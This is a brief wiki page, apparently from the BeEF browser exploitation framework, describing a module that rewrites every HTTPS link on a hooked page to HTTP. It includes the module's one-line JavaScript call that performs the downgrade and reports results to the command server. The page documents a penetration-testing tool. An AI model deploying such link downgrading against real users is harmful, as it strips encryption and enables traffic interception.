Clone
2
Module: Link Rewrite (HTTPS)
Haoxi Tan edited this page 2020-01-08 16:43:03 +10:00

Summary

  • Objective: Replace all HTTPS links to HTTP

  • Authors: bcoles

  • Browsers: All

  • Code

Internal Working

replace the protocol portion of all links from HTTPS to HTTP.


beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteLinksProtocol(old_protocol, new_protocol, selector)+' '+old_protocol+' links rewritten to '+new_protocol);

Feedback